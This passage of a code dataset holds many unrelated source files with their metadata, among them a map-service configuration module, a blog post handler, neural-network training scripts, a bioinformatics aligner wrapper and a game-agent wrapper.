0\r\n\ttry:\r\n\t\ttmp=json.dumps(conf[inputs[\"section\"][\"value\"]])\r\n\t\toutputs[\"Result\"][\"value\"]=tmp\r\n\texcept:\r\n\t\tconf[\"lenv\"][\"message\"]=\"Error occurs when trying to parse the \"+inputs[\"section\"][\"value\"]+\"section\"\r\n\t\treturn 4\r\n\treturn 3\r\n\r\ndef SaveConf(conf,inputs,outputs):\r\n\ti = 0\r\n\ttry:\r\n\t\tf = open(conf[\"lenv\"][\"cwd\"]+'/main.cfg', 'w')\r\n\t\tfor a in conf:\r\n\t\t\tif a != \"lenv\":\r\n\t\t\t\tif i>0:\r\n\t\t\t\t\tf.write(\"\\n\");\r\n\t\t\t\tf.write(\"[\"+a+\"]\\n\");\r\n\t\t\t\tif a!=inputs[\"section\"][\"value\"]:\r\n\t\t\t\t\tfor b in conf[a]:\r\n\t\t\t\t\t\t#print >> sys.stderr,\"STD[\"+b+\"=\"+conf[a][b]+\"]\\n\"\r\n\t\t\t\t\t\tf.write(b+\"=\"+conf[a][b]+\"\\n\")\r\n\t\t\t\telse:\r\n\t\t\t\t\tfor b in conf[a]:\r\n\t\t\t\t\t\ttry:\r\n\t\t\t\t\t\t\tb.index('_label')\r\n\t\t\t\t\t\t\tf.write(b+\"=\"+conf[a][b]+\"\\n\")\r\n\t\t\t\t\t\t\t#print >> sys.stderr,\"STD[\"+b+\"=\"+conf[a][b]+\"]\\n\"\r\n\t\t\t\t\t\texcept:\r\n\t\t\t\t\t\t\tif inputs.has_key(b):\r\n\t\t\t\t\t\t\t\tf.write(b+\"=\"+inputs[b][\"value\"]+\"\\n\")\r\n\t\t\t\t\t\t\t\t#print >> sys.stderr,\"DIFF[\"+b+\"=\"+inputs[b][\"value\"]+\"]\\n\"\r\n\t\t\t\t\t\t\telse:\r\n\t\t\t\t\t\t\t\tf.write(b+\"=\"+conf[a][b]+\"\\n\")\r\n\t\t\t\t\t\t\t\t#print >> sys.stderr,\"STD[\"+b+\"=\"+conf[a][b]+\"]\\n\"\r\n\r\n\t\t\t\ti+=1\r\n\t\toutputs[\"Result\"][\"value\"]=\"done\"\r\n\t\tf.close()\r\n\t\t#print >> sys.stderr, os.path.abspath(os.getcwd())+'/main1.cfg'+\" => \"+os.path.abspath(os.getcwd())+'/main.cfg'\r\n\t\t#shutil.copy(os.path.abspath(os.getcwd())+'/main1.cfg',os.path.abspath(os.getcwd())+'/main.cfg')\r\n\texcept:\r\n\t\t#print >> sys.stderr,\"Error occurs when trying to parse the section\"\r\n\t\t#print >> sys.stderr, inputs[\"section\"][\"value\"]\r\n\t\tconf[\"lenv\"][\"message\"]=\"Error occurs when trying to parse the \"+inputs[\"section\"][\"value\"]+\"section\"\r\n\t\treturn 4\r\n\treturn 3\r\n\r\n\r\ndef display1(conf,inputs,outputs):\r\n\t#print >> sys.stderr, conf\r\n\toutputs[\"Result\"][\"value\"]='''\r\n

Configuration

\r\n\r\n
\\n'''\r\n\ti=0\r\n\tfor a in conf:\r\n\t\tif a!='lenv':\r\n\t\t\ti=i+1\r\n\t\t\toutputs[\"Result\"][\"value\"]+='''\r\n \r\n'''\r\n\t\r\n\toutputs[\"Result\"][\"value\"]+='''\r\n
\r\n \r\n
'''\r\n\ttextarea=['abstract','keywords']\r\n\tfor a in conf:\r\n\t\tif a!='lenv':\r\n\t\t\toutputs[\"Result\"][\"value\"]+='''
\r\n\t\\n'''\r\n\t\t\tfor b in conf[a]:\r\n\t\t\t\ttry:\r\n\t\t\t\t\tb.index('_label')\r\n\t\t\t\texcept:\r\n\t\t\t\t\toutputs[\"Result\"][\"value\"]+='''\r\n\t \r\n\t \r\n\t \r\n\t \r\n'''\r\n\t\t\toutputs[\"Result\"][\"value\"]+='''\r\n\t
'''\r\n\t\t\t\t\tif conf[a].has_key(b+\"_label\"):\r\n\t\t\t\t\t\toutputs[\"Result\"][\"value\"]+=conf[a][b+\"_label\"]\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\toutputs[\"Result\"][\"value\"]+=b.title()\r\n\t\t\t\t\toutputs[\"Result\"][\"value\"]+='''\r\n:'''\r\n\t\t\t\t\t#print >> sys.stderr,\" Result Name \"+a+\" \"+b+\" \"+conf[a][b],textarea\r\n\t\t\t\t\ttry:\r\n\t\t\t\t\t\ttextarea.index(b)\r\n\t\t\t\t\t\toutputs[\"Result\"][\"value\"]+=''''''\r\n\t\t\t\t\texcept:\r\n\t\t\t\t\t\toutputs[\"Result\"][\"value\"]+=''''''\r\n\t\t\t\t\toutputs[\"Result\"][\"value\"]+='''
\r\n
\r\n'''\r\n\toutputs[\"Result\"][\"value\"]+='''\r\n
\r\n
'''\r\n\treturn 3\r\n\r\ndef display(conf,inputs,outputs):\r\n\tnameSpace = {'conf': conf,'inputs': inputs, 'outputs': outputs}\r\n\tt = Template(file=conf[\"lenv\"][\"cwd\"]+\"/configuration/display.html\",searchList=nameSpace)\r\n\toutputs[\"Result\"][\"value\"]=t.__str__()\r\n\treturn 3\r\n","sub_path":"mapmint-services/service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":3998,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"32371158","text":"#!/usr/bin/env python \n#-*- coding:utf-8 _*- \n\"\"\"\n@author: HJK \n@file: env.py \n@time: 2019-01-08\n\n全局变量\n\n\"\"\"\nimport logging\n\nFAKE_HEADERS = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', # noqa\n 'Accept-Charset': 'UTF-8,*;q=0.5',\n 'Accept-Encoding': 'gzip,deflate,sdch',\n 'Accept-Language': 'en-US,en;q=0.8',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:60.0) Gecko/20100101 Firefox/60.0', # noqa\n 'referer': 'https://www.google.com'\n}\n\nIOS_USERAGENT = 'Mozilla/5.0 (iPhone; CPU iPhone OS 9_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1'\n\n\n# 日志\nLOG_LEVEL = logging.DEBUG\nLOG_FILE = None\n\ndef init_option():\n # 命令行参数,写到函数里防止被意外初始化\n global OPTS\n OPTS = {\n # 自定义来源 -s --source\n 'source': 'qq netease kugou baidu',\n # 自定义数量 -c --count\n 'count': 5,\n # 保存目录 -o --outdir\n 'outdir': '.',\n # 搜索关键字\n 'keyword': '',\n # 显示详情\n 'verbose': False\n }\n\ndef set_option(opt, value):\n OPTS[opt] = value\n\ndef get_option(opt):\n return OPTS.get(opt, '')","sub_path":"glovar.py","file_name":"glovar.py","file_ext":"py","file_size_in_byte":1229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"534220902","text":"import asyncio\nfrom loguru import logger\n\nfrom core.apis.erudite import Erudite\nfrom core.apis.drive import Drive\nfrom core.gmail import alert_async\n\n\ndef get_offline(records: list) -> list:\n new_records = [record for record in records if record.get(\"type\") == \"Offline\" or record.get(\"type\") == \"Autorecord\"]\n if len(new_records) > 0:\n logger.info(\"Offline records older than needed date found\")\n return new_records\n else:\n logger.warning(\"No offline records older than needed date found\")\n return []\n\n\n@logger.catch\n@alert_async\nasync def main():\n erudite = Erudite()\n drive = Drive()\n\n records = await erudite.get_needed_records()\n offline_records = get_offline(records)\n logger.info(offline_records)\n\n tasks = []\n for record in offline_records:\n tasks.append(erudite.delete_record(record.get(\"id\")))\n tasks.append(drive.delete_video(record.get(\"url\")))\n\n await asyncio.gather(*tasks)\n\n logger.info(\"All needed records deleted\")\n\n\n\nif __name__ == \"__main__\":\n loop = asyncio.get_event_loop()\n loop.run_until_complete(main())\n","sub_path":"delete_old_records/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"392212946","text":"import torch\n\nfrom pysnn.network import SNNNetwork\n\nfrom evolutionary.utils.utils import randomize_env\n\n\ndef evaluate(valid_objectives, config, envs, h0, individual):\n # Keep track of all possible objectives\n objectives = {obj: 0.0 for obj in valid_objectives}\n\n for h, env in zip(h0, envs):\n # Reset network and env\n if isinstance(individual[0], SNNNetwork):\n individual[0].reset_state()\n obs = 
env.reset(h0=h)\n done = False\n spikes = 0\n\n while not done:\n # Step the environment\n obs = torch.from_numpy(obs)\n action = individual[0].forward(obs.view(1, 1, -1))\n action = action.numpy()\n obs, _, done, _ = env.step(action)\n # Increment number of spikes each step\n if isinstance(individual[0], SNNNetwork):\n spikes += (\n individual[0].neuron1.spikes.sum().item()\n + individual[0].neuron2.spikes.sum().item()\n if individual[0].neuron1 is not None\n else individual[0].neuron2.spikes.sum().item()\n )\n\n # Increment other scores\n # Time to land, final height and final velocity\n if env.t >= env.max_t or env.state[0] >= env.MAX_H:\n objectives[\"time to land\"] += 100.0\n objectives[\"time to land scaled\"] += 100.0\n objectives[\"final velocity\"] += 10.0\n objectives[\"final velocity squared\"] += 10.0\n objectives[\"final height\"] += 10.0\n else:\n objectives[\"time to land\"] += env.t - config[\"env\"][\"settle\"]\n objectives[\"time to land scaled\"] += (env.t - config[\"env\"][\"settle\"]) / h\n objectives[\"final velocity\"] += abs(env.state[1])\n objectives[\"final velocity squared\"] += env.state[1] ** 2\n objectives[\"final height\"] += env.state[0]\n\n # Spikes divided by real time to land, because we don't want to overly stimulate\n # too fast landings\n objectives[\"spikes\"] += spikes / (env.t - config[\"env\"][\"settle\"])\n\n # Select appropriate objectives\n # List, so order is guaranteed\n return [objectives[obj] / len(h0) for obj in config[\"evo\"][\"objectives\"]]\n","sub_path":"evolutionary/evaluate/evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"144452734","text":"import seaborn as sns\r\nfrom Bio import SeqIO\r\n\r\n\r\ndef how_distributed(your_fasta):\r\n \"\"\"\r\n creates a histogram and fit a kernel density estimate for distribution of lines' length in fasta file\r\n :param your_fasta: full path\r\n :return: none\r\n \"\"\"\r\n u = list(SeqIO.parse(your_fasta, 'fasta'))\r\n app = []\r\n for line in u:\r\n app.append(len(line))\r\n sns.distplot(app)\r\n \r\n","sub_path":"ДЗ№10/10..2.py","file_name":"10..2.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"571411358","text":"#newpost.py\n\"\"\"Contains class defination for handler class NewPostHandler.\"\"\"\n\nfrom blog import BlogHandler\nfrom models.post import POST\nfrom models.comment import COMMENT\n\n\nclass NewPostHandler(BlogHandler):\n \"\"\"Handler for NEW-POST page which allows users to create\n new blog posts.\"\"\"\n\n def get(self):\n \"\"\"Renders NEW-POST page if user has logged in otherwise\n renders SIGN-IN page.\"\"\"\n\n if self.user:\n self.render(\"newpost.html\",\n username = self.user.username,\n page_title = \"NEW-POST\")\n else:\n self.redirect(\"/signin\")\n\n def post(self):\n \"\"\"Validates the posted blog post's form information for\n errors and accordingly creates the appropriate entities\n and redirects the page.\"\"\"\n\n post_subject = self.request.get(\"subject\")\n post_content = self.request.get(\"content\")\n\n if post_subject and post_content:\n post = POST.create_post(user_id = str(self.user.key().id()),\n post_subject = post_subject,\n post_content = post_content)\n post.put()\n self.redirect(\"/post/\" + str(post.key().id()))\n else :\n self.render(\"newpost.html\",\n err_msg = \"Both SUBJECT and CONTENT can't be left empty.\",\n 
post_subject = post_subject,\n post_content = post_content,\n page_title = \"NEW-POST\")\n","sub_path":"handlers/newpost.py","file_name":"newpost.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"142429371","text":"import matplotlib\nmatplotlib.use(\"TkAgg\")\nimport os\nimport pandas as pd\nimport numpy as np\nimport torch\nimport torch.optim as optim\nimport time\nimport matplotlib.pyplot as plt\nimport sys\nsys.path.append(os.path.join(\"..\", \"..\"))\nfrom torchid.ssfitter import NeuralStateSpaceSimulator\nfrom torchid.ssmodels import CTSNeuralStateSpaceModel\n\n\nif __name__ == '__main__':\n\n # Set seed for reproducibility\n np.random.seed(0)\n torch.manual_seed(0)\n\n # Overall parameters\n num_iter = 40000 # gradient-based optimization steps\n seq_len = 256 # subsequence length m\n batch_size = 32 # batch size\n alpha = 0.5 # fit/consistency trade-off constant\n lr = 1e-4 # learning rate\n test_freq = 100 # print message every test_freq iterations\n\n # Load dataset\n df_data = pd.read_csv(os.path.join(\"data\", \"dataBenchmark.csv\"))\n u_id = np.array(df_data[['uEst']]).astype(np.float32)\n y_id = np.array(df_data[['yEst']]).astype(np.float32)\n ts = df_data['Ts'][0].astype(np.float32)\n time_exp = np.arange(y_id.size).astype(np.float32)*ts\n\n x_est = np.zeros((time_exp.shape[0], 2), dtype=np.float32)\n x_est[:, 0] = np.copy(y_id[:, 0])\n\n # Hidden state variable\n x_hidden_fit = torch.tensor(x_est, dtype=torch.float32, requires_grad=True) # hidden state is an optimization variable\n y_fit = y_id\n u_fit = u_id\n time_fit = time_exp\n\n # Setup neural model structure\n ss_model = CTSNeuralStateSpaceModel(n_x=2, n_u=1, n_feat=64, ts=ts)\n nn_solution = NeuralStateSpaceSimulator(ss_model)\n\n # Setup optimizer\n params_net = list(nn_solution.ss_model.parameters())\n params_hidden = [x_hidden_fit]\n optimizer = optim.Adam([\n {'params': params_net, 'lr': lr},\n {'params': params_hidden, 'lr': lr},\n ], lr=10*lr)\n\n # Batch extraction funtion\n def get_batch(batch_size, seq_len):\n\n # Select batch indexes\n num_train_samples = u_fit.shape[0]\n batch_start = np.random.choice(np.arange(num_train_samples - seq_len, dtype=np.int64), batch_size, replace=False) # batch start indices\n batch_idx = batch_start[:, np.newaxis] + np.arange(seq_len) # batch samples indices\n #batch_idx = batch_idx.T # transpose indexes to obtain batches with structure (m, q, n_x)\n\n # Extract batch data\n batch_t = torch.tensor(time_fit[batch_idx])\n batch_x0_hidden = x_hidden_fit[batch_start, :]\n batch_x_hidden = x_hidden_fit[[batch_idx]]\n batch_u = torch.tensor(u_fit[batch_idx])\n batch_y = torch.tensor(y_fit[batch_idx])\n\n return batch_t, batch_x0_hidden, batch_u, batch_y, batch_x_hidden\n\n # Scale loss with respect to the initial one\n with torch.no_grad():\n batch_t, batch_x0_hidden, batch_u, batch_y, batch_x_hidden = get_batch(batch_size, seq_len)\n batch_x_sim = nn_solution.f_sim_multistep(batch_x0_hidden, batch_u)\n #traced_nn_solution = torch.jit.trace(nn_solution, (batch_x0_hidden, batch_u))\n err_init = batch_x_sim - batch_y\n scale_error = torch.sqrt(torch.mean(err_init**2, dim=(0, 1)))\n\n LOSS_TOT = []\n LOSS_FIT = []\n LOSS_CONSISTENCY = []\n start_time = time.time()\n # Training loop\n\n #scripted_nn_solution = torch.jit.script(nn_solution)\n for itr in range(0, num_iter):\n\n optimizer.zero_grad()\n\n # Simulate\n batch_t, batch_x0_hidden, batch_u, batch_y, batch_x_hidden = 
get_batch(batch_size, seq_len)\n batch_x_sim = nn_solution.f_sim_multistep(batch_x0_hidden, batch_u) # 52 seconds RK | 13 FE\n #batch_x_sim = nn_solution(batch_x0_hidden, batch_u) # 70 seconds RK | 13 FE\n #batch_x_sim = scripted_nn_solution(batch_x0_hidden, batch_u) # 71 seconds RK | 13 FE\n\n # Compute fit loss\n err_fit = batch_x_sim[:, :, [0]] - batch_y\n err_fit_scaled = err_fit/scale_error[0]\n loss_fit = torch.mean(err_fit_scaled**2)\n\n # Compute consistency loss\n err_consistency = batch_x_sim - batch_x_hidden\n err_consistency_scaled = err_consistency/scale_error\n loss_consistency = torch.mean(err_consistency_scaled**2)\n\n # Compute trade-off loss\n loss = alpha*loss_fit + (1.0-alpha)*loss_consistency\n\n # Statistics\n LOSS_TOT.append(loss.item())\n LOSS_FIT.append(loss_fit.item())\n LOSS_CONSISTENCY.append(loss_consistency.item())\n if itr % test_freq == 0:\n print(f'Iter {itr} | Tradeoff Loss {loss:.4f} Consistency Loss {loss_consistency:.4f} Fit Loss {loss_fit:.4f}')\n\n # Optimize\n loss.backward()\n optimizer.step()\n\n train_time = time.time() - start_time\n print(f\"\\nTrain time: {train_time:.2f}\") # 182 seconds\n\n if not os.path.exists(\"models\"):\n os.makedirs(\"models\")\n\n # Save model\n if not os.path.exists(\"models\"):\n os.makedirs(\"models\")\n\n model_filename = f\"model_SS_{seq_len}step.pkl\"\n hidden_filename = f\"hidden_SS_{seq_len}step.pkl\"\n\n torch.save(nn_solution.ss_model.state_dict(), os.path.join(\"models\", model_filename))\n torch.save(x_hidden_fit, os.path.join(\"models\", hidden_filename))\n\n # Plot figures\n if not os.path.exists(\"fig\"):\n os.makedirs(\"fig\")\n\n # Loss plot\n fig, ax = plt.subplots(1, 1)\n ax.plot(LOSS_TOT, 'k', label='TOT')\n ax.plot(LOSS_CONSISTENCY, 'r', label='CONSISTENCY')\n ax.plot(LOSS_FIT, 'b', label='FIT')\n ax.grid(True)\n ax.legend(loc='upper right')\n ax.set_ylabel(\"Loss (-)\")\n ax.set_xlabel(\"Iteration (-)\")\n\n fig_name = f\"WT_SS_loss_{seq_len}step_noise.pdf\"\n fig.savefig(os.path.join(\"fig\", fig_name), bbox_inches='tight')\n\n # Hidden variable plot\n x_hidden_fit_np = x_hidden_fit.detach().numpy()\n fig, ax = plt.subplots(2, 1, sharex=True)\n ax[0].plot(y_id[:, 0], 'b', label='Measured')\n ax[0].plot(x_hidden_fit_np[:, 0], 'r', label='Hidden')\n ax[0].legend()\n ax[0].grid(True)\n\n #ax[1].plot(x_est[:, 1], 'k', label='Estimated')\n ax[1].plot(x_hidden_fit_np[:, 1], 'r', label='Hidden')\n ax[1].legend()\n ax[1].grid(True)\n\n # Simulate\n y_val = np.copy(y_fit)\n u_val = np.copy(u_fit)\n\n #x0_val = np.array(x_est[0, :])\n #x0_val[1] = 0.0\n x0_val = x_hidden_fit[0, :].detach().numpy() # initial state had to be estimated, according to the dataset description\n x0_torch_val = torch.from_numpy(x0_val)\n u_torch_val = torch.tensor(u_val)\n\n with torch.no_grad():\n x_sim_torch = nn_solution.f_sim(x0_torch_val[None, :], u_torch_val[:, None, :])\n y_sim_torch = x_sim_torch[:, 0]\n x_sim = y_sim_torch.detach().numpy()\n\n\n # Simulation plot\n fig, ax = plt.subplots(2, 1, sharex=True, figsize=(6, 7.5))\n #ax[0].plot(time_exp, q_ref, 'k', label='$q_{\\mathrm{ref}}$')\n ax[0].plot(time_exp, y_val, 'k', label='$y_{\\mathrm{meas}}$')\n ax[0].plot(time_exp, x_sim[:, 0], 'r', label='$\\hat y_{\\mathrm{sim}}$')\n ax[0].legend(loc='upper right')\n ax[0].grid(True)\n ax[0].set_ylabel(\"Voltage (V)\")\n\n ax[1].plot(time_exp, u_id, 'k', label='$u_{in}$')\n ax[1].set_xlabel(\"Time (s)\")\n ax[1].set_ylabel(\"Voltage (V)\")\n ax[1].grid(True)\n ax[1].set_xlabel(\"Time 
(s)\")\n","sub_path":"examples/CTS_example/CTS_SS_fit_multistep.py","file_name":"CTS_SS_fit_multistep.py","file_ext":"py","file_size_in_byte":7153,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"97956933","text":"# coding=utf-8\n# Created by OhBonsai at 2018/3/13\n\nfrom subprocess import CalledProcessError, check_output as run\n\nFLAKE8_COMMAND = 'flake8'\n\nFLAKE8_INPUTS = [\n 'app',\n 'tests'\n]\n\n\ndef pytest_generate_tests(metafunc):\n metafunc.parametrize('folder', FLAKE8_INPUTS)\n\n\ndef test_flake8(folder):\n \"\"\" Run skylines package through flake8 \"\"\"\n try:\n run([FLAKE8_COMMAND, folder])\n except CalledProcessError as e:\n print(e.output)\n raise AssertionError('flake8 has found errors.')\n except OSError:\n raise OSError('Failed to run flake8. Please check that you have '\n 'installed it properly.')\n\n","sub_path":"tests/test_flake8.py","file_name":"test_flake8.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"259213817","text":"#!/usr/bin/env python\n__author__ = \"etseng@pacb.com\"\n\"\"\"\nWrapper for running STARlong.\nParameters are pre-set according to:\n\n\n\"\"\"\nimport shutil\nimport subprocess\nimport tempfile\nfrom pathlib import Path\n\nimport typer\n\nfrom cupcake import version_callback\n\napp = typer.Typer(name=\"cupcake.sequence.STARwrapper\", help=\"Wrapper for running STAR\")\n\n\nCMD_STARlong = \"/home/UNIXHOME/etseng/software_downloads/STAR-2.5.3a/bin/Linux_x86_64/STAR --runMode alignReads --outSAMattributes NH HI NM MD --readNameSeparator space --outFilterMultimapScoreRange 1 --outFilterMismatchNmax 2000 --scoreGapNoncan -1 --scoreGapGCAG -4 --scoreGapATAC -8 --scoreDelOpen -1 --scoreDelBase -1 --scoreInsOpen -1 --scoreInsBase -1 --alignEndsType Local --seedSearchStartLmax 50 --seedPerReadNmax 100000 --seedPerWindowNmax 1000 --alignTranscriptsPerReadNmax 100000 --alignTranscriptsPerWindowNmax 10000\"\nCMD_STAR2_format = (\n CMD_STARlong\n + \" --twopassMode None --runThreadN {c} --genomeDir {d} --readFilesIn {i}\"\n)\n\n\ndef run_STAR(in_fasta, out_sam, genome_dir, cpus):\n with tempfile.mkdtemp(prefix=\"STARtmp\") as tmp_dir:\n in_fasta = Path(in_fasta)\n out_sam = Path(out_sam)\n cmd = CMD_STAR2_format.format(c=cpus, d=genome_dir, i=in_fasta)\n if subprocess.check_call(cmd, shell=True, cwd=tmp_dir) != 0:\n raise subprocess.CalledProcessError(f\"ERROR RUNNING CMD: {cmd}\")\n\n shutil.move(Path(tmp_dir, \"Aligned.out.sam\"), out_sam)\n\n\n@app.command(name=\"\")\ndef main(\n genome_dir: str = typer.Argument(...),\n in_fasta: str = typer.Argument(...),\n out_sam: str = typer.Argument(...),\n cpus: int = typer.Option(10, help=\"Number of threads (default: 10)\"),\n version: bool = typer.Option(\n None,\n \"--version\",\n callback=version_callback,\n is_eager=True,\n help=\"Prints the version of the SQANTI3 package.\",\n ),\n) -> None:\n\n run_STAR(in_fasta, out_sam, genome_dir, cpus)\n\n\nif __name__ == \"__main__\":\n typer.run(main)\n","sub_path":"src/cupcake/sequence/STARwrapper.py","file_name":"STARwrapper.py","file_ext":"py","file_size_in_byte":1990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"616276162","text":"from bs4 import BeautifulSoup\nfrom typing import Generator\nfrom .data_source import AnimeResSearch\n\nget = AnimeResSearch.get\n\n\nclass AnimeResFilter:\n __slots__ = (\"data\", \"html\", \"types\")\n\n def __init__(self, 
data: Generator, html: BeautifulSoup = None):\n \"\"\"\n :param data: generator of fetched resources\n :param html: the full page\n \"\"\"\n self.data = dict()\n self.html = html\n self.types = []\n if data:\n for value in data:\n if value[\"type\"] in self.types:\n self.data[value[\"type\"]].append(value)\n else:\n self.types.append(value[\"type\"])\n self.data[value[\"type\"]] = [value]\n\n async def type_msg(self, bot) -> str:\n \"\"\"\n :param bot: used to send the fetched information\n :return: a string for the bot to send once information has been fetched\n having at least one type means resources were found;\n if there is only one type, send that single entry directly,\n otherwise send the list of all types\n \"\"\"\n if self.types:\n if len(self.types) == 1:\n await self.confirm_type_send(bot, self.data[self.types[0]][0])\n await bot.send(\"Available types:\\n\" + \"\\n\".join([f\"{i}. {t}\" for i, t in enumerate(self.types)]))\n else:\n await bot.finish(\"No resources found; check that they exist and that the input is correct, then try again.\")\n return \"Choose a type by name or by numeric index\"\n\n async def confirm_type_msg(self, bot, text: str):\n \"\"\"\n :param bot: used to send the fetched information\n :param text: the keyword text\n try to convert the text to a number;\n if it is still a string, check whether it names one of the types above and, if so, send that entry;\n if it is a number, check whether it is a valid index into the types and, if so, send that entry\n \"\"\"\n try:\n text = int(text)\n except ValueError:\n ...\n if isinstance(text, str):\n for t in self.types:\n if t in text:\n await self.confirm_type_send(bot, self.data[t][0])\n continue\n else:\n if 0 <= text < len(self.types):\n await self.confirm_type_send(bot, self.data[self.types[text]][0])\n await bot.finish(\"Invalid type; please start a new resource search!\")\n\n @staticmethod\n async def confirm_type_send(bot, data: dict):\n \"\"\"\n :param bot: used to send the message\n :param data: one entry from the fetched resources\n \"\"\"\n text = f\"Name: {data['title'][:80]}...\\nSize: {data['size']}\"\n magnet = await AnimeResSearch.get_magnet(data[\"href\"])\n await bot.send(text)\n await bot.finish(magnet)\n\n\n\n\n\n\n\n\n\n\n","sub_path":"src/plugins/animeres/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"157089834","text":"from subprocess import Popen, PIPE\nfrom threading import Thread\nfrom queue import Queue, Empty\n\nimport atexit\nimport os\nimport sys\nagent_processes = [None, None]\nt = None\nq = None\ndef cleanup_process():\n global agent_processes\n for proc in agent_processes:\n if proc is not None:\n proc.kill()\ndef enqueue_output(out, queue):\n for line in iter(out.readline, b''):\n queue.put(line)\n out.close()\ndef js_agent(observation, configuration):\n \"\"\"\n a wrapper around a js agent\n \"\"\"\n global agent_processes, t, q\n\n agent_process = agent_processes[observation.player]\n ### Do not edit ###\n if agent_process is None:\n if \"__raw_path__\" in configuration:\n cwd = os.path.dirname(configuration[\"__raw_path__\"])\n else:\n cwd = os.path.dirname(__file__)\n agent_process = Popen([\"node\", \"main.js\"], stdin=PIPE, stdout=PIPE, stderr=PIPE, cwd=cwd)\n agent_processes[observation.player] = agent_process\n atexit.register(cleanup_process)\n\n # following 4 lines from https://stackoverflow.com/questions/375427/a-non-blocking-read-on-a-subprocess-pipe-in-python\n q = Queue()\n t = Thread(target=enqueue_output, args=(agent_process.stderr, q))\n t.daemon = True # thread dies with the program\n t.start()\n if observation.step == 0:\n # fixes bug where updates array is shared, but the first update is agent dependent actually\n observation[\"updates\"][0] = f\"{observation.player}\"\n \n # print observations to agent\n agent_process.stdin.write((\"\\n\".join(observation[\"updates\"]) + \"\\n\").encode())\n agent_process.stdin.flush()\n\n # wait for data written to stdout\n agent1res = 
(agent_process.stdout.readline()).decode()\n _end_res = (agent_process.stdout.readline()).decode()\n\n while True:\n try: line = q.get_nowait()\n except Empty:\n # no standard error received, break\n break\n else:\n # standard error output received, print it out\n print(line.decode(), file=sys.stderr, end='')\n\n outputs = agent1res.split(\"\\n\")[0].split(\",\")\n actions = []\n for cmd in outputs:\n if cmd != \"\":\n actions.append(cmd)\n return actions","sub_path":"kaggle_environments/envs/lux_ai_2021/test_agents/js_simple/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"190830751","text":"import argparse\nimport pickle\nimport numpy as np\nimport nltk\n\nfrom tqdm import tqdm\n\nfrom prep_data import *\n# def prep_data():\n# nltk.download('brown')\n# nltk.download('universal_tagset')\n\n# corpus = nltk.corpus.brown.tagged_words()\n# return [(word, nltk.tag.map_tag('brown','universal',tag)) for word,tag in corpus]\n\n\ndef calculate_transition_probs(data,tag_dict):\n # Function to calculate bigram counts of tags given a list of list of tuples, having (word,tag)\n # where first ele of each tag-list is , last is \n # tag_dict is dict containing list of all unique tags present in data\n # lambda_interpolation is the coefficient for linear interpolation\n bigram_counts = np.zeros((len(tag_dict),len(tag_dict)))\n # monogram_counts = np.zeros((len(tag_dict),1))\n for sentence in data:\n # monogram_counts[tag_dict[sentence[0][1]]] += 1\n for i in range(1,len(sentence)):\n bigram_counts[tag_dict[sentence[i][1]],tag_dict[sentence[i-1][1]]]+=1\n # monogram_counts[tag_dict[sentence[i][1]]] += 1\n #do discounting and smoothing here\n # monogram_probs = monogram_counts.mean()\n bigram_probs = bigram_counts/(bigram_counts.sum(axis=1)+1e-10)\n return bigram_probs\n\ndef calculate_emmision_probs(data,tag_dict,word_dict,lambda_interpolation):\n # data here is a list of list of tuples, having (word,tag)\n emmision_probs = np.zeros((len(word_dict),len(tag_dict)))\n for k in data:\n for i in k: \n # print(i)\n emmision_probs[word_dict[i[0]],tag_dict[i[1]]] += 1\n return ((1-lambda_interpolation)*emmision_probs/((emmision_probs.sum(axis=1).reshape(-1,1))+1e-10)) + lambda_interpolation/(1e+8)\n\n\nclass Probs:\n def __init__(self,sents,word_dict,tag_dict,text_file_path='wiki-en-train.norm_pos'):\n\n # data,self.word_dict,self.tag_dict = preprocess(text_file_path)\n self.emmision_probs = calculate_emmision_probs(sents,tag_dict,word_dict,0.1)\n self.transition_probs = calculate_transition_probs(sents,tag_dict) \n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--model\", help=\"Model file\")\n # parser.add_argument(\"--train-file\", help=\"Input file to be decoded\")\n args = parser.parse_args()\n data = DataLoader()\n data.preprocess_hmm()\n word_dict,tag_dict = data.word_dict,data.tag_dict\n for i in range(5):\n print(\"Training Fold no. 
